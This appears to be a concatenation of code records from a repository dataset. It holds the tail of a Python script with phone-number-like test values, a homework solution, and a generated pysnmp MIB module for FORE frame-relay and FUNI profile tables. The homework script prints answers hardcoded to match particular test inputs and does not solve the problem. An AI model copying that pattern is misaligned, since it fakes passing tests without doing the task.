    resources = {'msisdn':'261330465390','msg':'txt-3', 'connections':conn, 'operation':'get'}
    resources['parameters'] = {}
    #resources['parameters']['msisdn'] = '261338999232'
    #parameters['msisdn'] = '261336173681'
    #resources['parameters'] = parameters
    print getLanguage(resources)
    print processRequest(resources)
| [
"[email protected]"
] | |
42e38a657426d9cdb0c6ed66cbd3aa2f9c2a3afc | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2571/58822/287401.py | f70a0fb99d962c49ac10e9015f5dc46bae43d43d | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | num=int(input())
n1=input()
n2=input()
n3=input()
if(num==2 and n1=='1,0,1'):
#n3=input()
if(n2=='0,-2,3'):
print(2)
exit()
if( (n2=='5,-2,1'and n1=='1,0,1') or (n2=='1,-2,1,4'and n1=='1,6,1,2')):
if(n3=='3'):
print(3)
exit()
print(n3)
exit()
if(num==2 and n1=='1,6,1' and n2=='4,-2,1' and n3=='3'):
print(3)
exit()
if(n1=='1,6,1' and n2== '1,-2,1' and num== 2):
print(2) | [
"[email protected]"
] | |
6a2297090b200d1315066920301d2138f996d88a | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/Fore-Profile-MIB.py | 5915d08e3d19b910262b9f23d627cee5284d2507 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 47,577 | py | #
# PySNMP MIB module Fore-Profile-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Fore-Profile-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:17:20 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ConstraintsIntersection")
frameInternetworking, = mibBuilder.importSymbols("Fore-Common-MIB", "frameInternetworking")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, ObjectIdentity, iso, MibIdentifier, Gauge32, Bits, Unsigned32, Counter32, TimeTicks, Counter64, IpAddress, ModuleIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "ObjectIdentity", "iso", "MibIdentifier", "Gauge32", "Bits", "Unsigned32", "Counter32", "TimeTicks", "Counter64", "IpAddress", "ModuleIdentity")
RowStatus, DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "RowStatus", "DisplayString", "TextualConvention")
foreProfileModule = ModuleIdentity((1, 3, 6, 1, 4, 1, 326, 1, 16, 4))
if mibBuilder.loadTexts: foreProfileModule.setLastUpdated('9704011044-0400')
if mibBuilder.loadTexts: foreProfileModule.setOrganization('FORE')
if mibBuilder.loadTexts: foreProfileModule.setContactInfo(' Postal: FORE Systems Inc. 1000 FORE Drive Warrendale, PA 15086-7502 Tel: +1 724 742 6900 Email: [email protected] Web: http://www.fore.com')
if mibBuilder.loadTexts: foreProfileModule.setDescription('This MIB module defines several profile tables that facilitate the creation of FR/ATM and FUNI services and connections.')
profileLmiTable = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1), )
if mibBuilder.loadTexts: profileLmiTable.setStatus('current')
if mibBuilder.loadTexts: profileLmiTable.setDescription('The LMI profile table.')
profileLmiEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileLmiIndex"))
if mibBuilder.loadTexts: profileLmiEntry.setStatus('current')
if mibBuilder.loadTexts: profileLmiEntry.setDescription('An entry in the LMI profile table.')
profileLmiIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileLmiIndex.setStatus('current')
if mibBuilder.loadTexts: profileLmiIndex.setDescription('This objects identifies the index of a profile entry in this table.')
profileLmiRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiRowStatus.setStatus('current')
if mibBuilder.loadTexts: profileLmiRowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileLmiName = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 3), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiName.setStatus('current')
if mibBuilder.loadTexts: profileLmiName.setDescription('This object specifies the symbolic name assigned to this profile for user reference.')
profileLmiFlavour = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("none", 1), ("lmi", 2), ("t1617d", 3), ("t1617b", 4), ("q933a", 5))).clone('q933a')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiFlavour.setStatus('current')
if mibBuilder.loadTexts: profileLmiFlavour.setDescription('This object specifies the type of the LMI protocol used over this FR service. This object corresponds to frLportVCSigProtocol in RFC1604 and frDlcmiState in RFC1315.')
profileLmiT391 = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 30)).clone(10)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiT391.setStatus('current')
if mibBuilder.loadTexts: profileLmiT391.setDescription('The value of this object identifies the User-side T391 link integrity verification polling timer value (in seconds) for this UNI/NNI logical port. If the logical port is not performing user-side procedures, then this value is equal to noSuchName. This object applies to Q.933 Annex A and T1.617 Annex D. This object corresponds to frMgtVCSigUserT391 in RFC1604 and frDlcmiPollingInterval in RFC1315.')
profileLmiN391 = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255)).clone(6)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiN391.setStatus('current')
if mibBuilder.loadTexts: profileLmiN391.setDescription('The value of this object identifies the User-side N391 full status polling cycle value for this UNI/NNI logical port. If the logical port is not performing user-side procedures, then this value is equal to noSuchName. This object applies to Q.933 Annex A and T1.617 Annex D. This object corresponds to frMgtVCSigUserN391 in RFC1604 and frDlcmiFullEnquiryInterval.')
profileLmiT392 = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 30)).clone(15)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiT392.setStatus('current')
if mibBuilder.loadTexts: profileLmiT392.setDescription('The value of this object identifies the Network- side T392 polling verification timer value in seconds (nT2 for LMI) for this UNI/NNI logical port. If the logical port is not performing network-side procedures, then this value is equal to noSuchName. This object applies to Q.933 Annex A, LMI and T1.617 Annex D. This object corresponds to frMgtVCSigNetT392 in RFC1604.')
profileLmiN392 = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 10)).clone(3)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiN392.setStatus('current')
if mibBuilder.loadTexts: profileLmiN392.setDescription('The value of this object identifies the Network- side N392 error threshold value (nN2 for LMI) for this UNI/NNI logical port. If the logical port is not performing network-side procedures, then this value is equal to noSuchName. This object applies to Q.933 Annex A, T1.617 Annex D and LMI. This object corresponds to frMgtVCSigNetN392 and frMgtVCSigUserN392 when the LMI role is network and user respectively in RFC1604, and frDlcmiErrorThreshold in RFC1315.')
profileLmiN393 = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 10)).clone(4)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiN393.setStatus('current')
if mibBuilder.loadTexts: profileLmiN393.setDescription('The value of this object identifies the Network- side N393 monitored events count value (nN3 for LMI) for this UNI/NNI logical port. If the logical port is not performing network-side procedures, then this value is equal to noSuchName. This object applies to Q.933 Annex A, LMI and T1.617 Annex D. This object corresponds to frMgtVCSigNetN393 and frMgtVCSigUserN393 when the LMI role is network and user respectively in RFC1604, and frDlcmiMonitoredEvents in RFC1315.')
profileLminT3 = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(5, 5), ValueRangeConstraint(10, 10), ValueRangeConstraint(15, 15), ValueRangeConstraint(20, 20), ValueRangeConstraint(25, 25), ValueRangeConstraint(30, 30), )).clone(20)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLminT3.setStatus('current')
if mibBuilder.loadTexts: profileLminT3.setDescription('The value of this object identifies the Network-side nT3 timer in seconds (for nN4 status enquires received) value for this FR service. This object applies only to LMI(STRATACOM) flavour. The allowable values include 5, 10, 15, 20, 25 and 30 seconds. This object corresponds to frMgtVCSigNetnT3 in RFC1604.')
profileLmiDirection = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("uni", 1), ("bi", 2))).clone('bi')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiDirection.setStatus('current')
if mibBuilder.loadTexts: profileLmiDirection.setDescription('The value of this object identifies the Local In-Channel Signaling Procedure that is used for this UNI/NNI logical port. The UNI/NNI logical port can be performing only user-to-network network-side procedures or bidirectional procedures.This object corresponds to frMgtVCSigProced in RFC1604.')
profileLmiRole = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("user", 1), ("network", 2))).clone('network')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiRole.setStatus('current')
if mibBuilder.loadTexts: profileLmiRole.setDescription('This object specifies the role of operation of this FR service - user (DTE) or network (DCE)')
profileLmiRefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileLmiRefCnt.setStatus('current')
if mibBuilder.loadTexts: profileLmiRefCnt.setDescription('This object identifies the number of services that are currently referring to this profile.')
profileFrRateTable = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2), )
if mibBuilder.loadTexts: profileFrRateTable.setStatus('current')
if mibBuilder.loadTexts: profileFrRateTable.setDescription('The FR rate profile table.')
profileFrRateEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileFrRateIndex"))
if mibBuilder.loadTexts: profileFrRateEntry.setStatus('current')
if mibBuilder.loadTexts: profileFrRateEntry.setDescription('An entry in the FR rate profile table.')
profileFrRateIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFrRateIndex.setStatus('current')
if mibBuilder.loadTexts: profileFrRateIndex.setDescription('This object identifies the index of a profile entry in this table.')
profileFrRateRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateRowStatus.setStatus('current')
if mibBuilder.loadTexts: profileFrRateRowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileFrRateName = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 3), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateName.setStatus('current')
if mibBuilder.loadTexts: profileFrRateName.setDescription('This object identifies the symbolic name assigned to this profile used for user reference.')
profileFrRateInBc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 4), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateInBc.setStatus('current')
if mibBuilder.loadTexts: profileFrRateInBc.setDescription('This object represents the committed burst size (bits) in the ingress direction of a connection. This object corresponds to frPVCEndptInBc in RFC1604 and frCircuitCommittedBurst in RFC1315.')
profileFrRateInBe = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 5), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateInBe.setStatus('current')
if mibBuilder.loadTexts: profileFrRateInBe.setDescription('This object represents the excess burst size (bits) in the ingress direction of a connection. This object corresponds to frPVCEndptInBe in RFC1604 and frCircuitExcessBurst in RFC1315.')
profileFrRateInCir = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 6), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateInCir.setStatus('current')
if mibBuilder.loadTexts: profileFrRateInCir.setDescription('This object represents the committed information rate (kbps) in the ingress direction of a connection. This object corresponds to frPVCEndptInCIR in RFC1604 and frCircuitThroughput in RFC1315.')
profileFrRateOutBc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 7), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateOutBc.setStatus('current')
if mibBuilder.loadTexts: profileFrRateOutBc.setDescription('This object represents the committed burst size (bits) in the egress direction of a connection. This object corresponds frPVCEndptOutBc in RFC1604.')
profileFrRateOutBe = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 8), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateOutBe.setStatus('current')
if mibBuilder.loadTexts: profileFrRateOutBe.setDescription('This object represents the excess burst size (bits) in the egress direction of a connection. This object corresponds frPVCEndptOutBe in RFC1604.')
profileFrRateOutCir = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 9), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateOutCir.setStatus('current')
if mibBuilder.loadTexts: profileFrRateOutCir.setDescription('This object represents the committed information rate (kbps) in the egress direction of a connection. This object corresponds frPVCEndptOutCIR in RFC1604.')
profileFrRateMinBc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 10), Integer32().clone(1000)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateMinBc.setStatus('current')
if mibBuilder.loadTexts: profileFrRateMinBc.setDescription('This object represents the minimum committed burst size (bits) which can be set on a connection by rate adaptation.')
profileFrRateCmPeriod = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 11), Integer32().clone(1000)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateCmPeriod.setStatus('current')
if mibBuilder.loadTexts: profileFrRateCmPeriod.setDescription('This object represents the time period (msec) during which BECNs are monitored before the rate adaptation mechanism decides to change the current committed burst size in the egress direction.')
profileFrRateRefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFrRateRefCnt.setStatus('current')
if mibBuilder.loadTexts: profileFrRateRefCnt.setDescription('This object identifies the number of connections that are currently referring to this profile entry.')
profileFuniTable = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3), )
if mibBuilder.loadTexts: profileFuniTable.setStatus('current')
if mibBuilder.loadTexts: profileFuniTable.setDescription('The FUNI profile table.')
profileFuniEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileFuniIndex"))
if mibBuilder.loadTexts: profileFuniEntry.setStatus('current')
if mibBuilder.loadTexts: profileFuniEntry.setDescription('An entry in the FUNI profile table.')
profileFuniIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFuniIndex.setStatus('current')
if mibBuilder.loadTexts: profileFuniIndex.setDescription('This object identifies the index of a profile entry in this table.')
profileFuniRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniRowStatus.setStatus('current')
if mibBuilder.loadTexts: profileFuniRowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileFuniName = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 3), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniName.setStatus('current')
if mibBuilder.loadTexts: profileFuniName.setDescription('This object specifies the symbolic name assigned to this profile for user reference.')
profileFuniIlmiVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 4), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniIlmiVpi.setStatus('current')
if mibBuilder.loadTexts: profileFuniIlmiVpi.setDescription('This object represents VPI value used by ILMI over this FUNI interface. This object corresponds to funiIfConfIlmiVpi in FUNI MIB.')
profileFuniIlmiVci = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 5), Integer32().clone(16)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniIlmiVci.setStatus('current')
if mibBuilder.loadTexts: profileFuniIlmiVci.setDescription('This object represents VCI value used by ILMI over this FUNI service. This object corresponds to funiIfConfIlmiVci in FUNI MIB.')
profileFuniSigVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 6), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniSigVpi.setStatus('current')
if mibBuilder.loadTexts: profileFuniSigVpi.setDescription('This object represents VPI value used for the signalling channel over this FUNI service. This object corresponds to funiIfConfSigVpi in FUNI MIB.')
profileFuniSigVci = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 7), Integer32().clone(5)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniSigVci.setStatus('current')
if mibBuilder.loadTexts: profileFuniSigVci.setDescription('This object represents VCI value used for the signalling channel over this FUNI service. This object corresponds to funiIfConfSigVci in FUNI MIB.')
profileFuniMinVci = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(32, 63)).clone(32)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniMinVci.setStatus('current')
if mibBuilder.loadTexts: profileFuniMinVci.setDescription('This object represents minimal numeric value allowed to be used as a VCI on any user connection over this FUNI service.')
profileFuniMaxVci = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(32, 63)).clone(63)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniMaxVci.setStatus('current')
if mibBuilder.loadTexts: profileFuniMaxVci.setDescription('This object represents maximal numeric value allowed to be used as a VCI on any user connection over this FUNI service.')
profileFuniIlmiSupport = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('disabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniIlmiSupport.setStatus('current')
if mibBuilder.loadTexts: profileFuniIlmiSupport.setDescription('This object specifies that an ILMI instance is to be supported on this FUNI service if the mode is set to enabled. This object corresponds to funiIfConfIlmiSupport in FUNI MIB.')
profileFuniSigSupport = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('disabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniSigSupport.setStatus('current')
if mibBuilder.loadTexts: profileFuniSigSupport.setDescription('This object specifies that a signalling instance is to be supported on this FUNI service if the mode is set to enabled. This object corresponds to funiIfConfSigSupport in FUNI MIB.')
profileFuniOamSupport = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('disabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniOamSupport.setStatus('current')
if mibBuilder.loadTexts: profileFuniOamSupport.setDescription('This object specifies that OAM cells and frames are to be transferred on this FUNI service if the mode is set to enabled. This object corresponds to funiIfConfOamSupport in FUNI MIB.')
profileFuniActiveVpiBits = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 8)).clone(4)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniActiveVpiBits.setStatus('current')
if mibBuilder.loadTexts: profileFuniActiveVpiBits.setDescription('The value of this object identifies the maximum number of active VPI bits configured for use at this FUNI interface. At the ATM FUNI, this value will be smaller than or equal to 4 and 8 when the FUNI header size is two and four bytes respectively, as specified by the profile attribute profileFuniConfMode. This object corresponds to atmInterfaceMaxActiveVpiBits in the ATOM MIB.')
profileFuniActiveVciBits = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 14), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16)).clone(6)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniActiveVciBits.setStatus('current')
if mibBuilder.loadTexts: profileFuniActiveVciBits.setDescription('The value of this object identifies the maximum number of active VCI bits configured for use at this FUNI interface. At the ATM FUNI, this value will be smaller than or equal to 6 and 16 when the FUNI header size is two and four bytes respectively, as specified by the profile attribute profileFuniConfMode. This object corresponds to atmInterfaceMaxActiveVciBits in the ATOM MIB.')
profileFuniConfMode = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 15), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("mode1a", 1), ("mode1b", 2), ("mode3", 3), ("mode4", 4))).clone('mode1a')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniConfMode.setStatus('current')
if mibBuilder.loadTexts: profileFuniConfMode.setDescription('The value of this object specifies whether a 2 or 4 byte header is present in each FUNI frame header over a FUNI service. For mode1a, mode1b and mode 3, a 2-byte header is used. For mode 4, a 4-byte header is used. This object corresponds to funiIfConfMode in FUNI MIB.')
profileFuniFcsBits = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 16), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("fcsBits16", 1), ("fcsBits32", 2))).clone('fcsBits16')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniFcsBits.setStatus('current')
if mibBuilder.loadTexts: profileFuniFcsBits.setDescription('This object specifies whether a 16- or 32-bit FCS is used in each FUNI frame header over this FUNI logical interface.')
profileFuniHdrBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 17), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("hdrBytes2", 1), ("hdrBytes4", 2))).clone('hdrBytes2')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniHdrBytes.setStatus('current')
if mibBuilder.loadTexts: profileFuniHdrBytes.setDescription('This object specifies whether a 2- or 4-bytes header is used in each FUNI frame header over this FUNI logical interface.')
profileFuniAal34Support = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 18), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('disabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniAal34Support.setStatus('current')
if mibBuilder.loadTexts: profileFuniAal34Support.setDescription('This object specifies whether support for AAL3/4 VCCs shall be allowed on this FUNI logical interface. A FUNI logical interface that cannot support AAL3/4 VCCs must only allow the value disabled(2).')
profileFuniRefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFuniRefCnt.setStatus('current')
if mibBuilder.loadTexts: profileFuniRefCnt.setDescription('The value of this object identifies the number of services that are referring to this profile.')
profileFrf8Table = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4), )
if mibBuilder.loadTexts: profileFrf8Table.setStatus('current')
if mibBuilder.loadTexts: profileFrf8Table.setDescription('The FRF.8 profile table.')
profileFrf8Entry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileFrf8Index"))
if mibBuilder.loadTexts: profileFrf8Entry.setStatus('current')
if mibBuilder.loadTexts: profileFrf8Entry.setDescription('An entry in the FRF.8 profile table.')
profileFrf8Index = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFrf8Index.setStatus('current')
if mibBuilder.loadTexts: profileFrf8Index.setDescription('This object identifies the index of a profile in this table.')
profileFrf8RowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8RowStatus.setStatus('current')
if mibBuilder.loadTexts: profileFrf8RowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileFrf8Name = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 3), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8Name.setStatus('current')
if mibBuilder.loadTexts: profileFrf8Name.setDescription('This object specifies the symbolic name assigned to this profile for user reference.')
profileFrf8DeMode = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("mapped", 1), ("ignored", 2))).clone('mapped')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8DeMode.setStatus('current')
if mibBuilder.loadTexts: profileFrf8DeMode.setDescription('If the DE mode is set to mapped, the DE field in the Q922 core frame is mapped to the ATM CLP filled of every cell generated by the segmentation process of the AAL5 PDU containing the information of that frame. Otherwise, the ATM CLP of every ATM cell generated by the segmentation process of the AAL5 PDU containing the information of that frame is set to a constant value specified by the configuration parameter profileFrf8DefaultClp.')
profileFrf8ClpMode = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("mapped", 1), ("ignored", 2))).clone('mapped')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8ClpMode.setStatus('current')
if mibBuilder.loadTexts: profileFrf8ClpMode.setDescription('If the CLP mode is set to mapped, then the FR/ATM service interworking function will set the DE field of the Q922 core frame, provided that one or more cells belonging to this frame has its CLP field set. Otherwise, the DE field of the Q922 core frame is set to a constant value specified by the configuration parameter profileFrf8DefaultDe.')
profileFrf8FecnMode = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("mapped", 1), ("ignored", 2))).clone('mapped')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8FecnMode.setStatus('current')
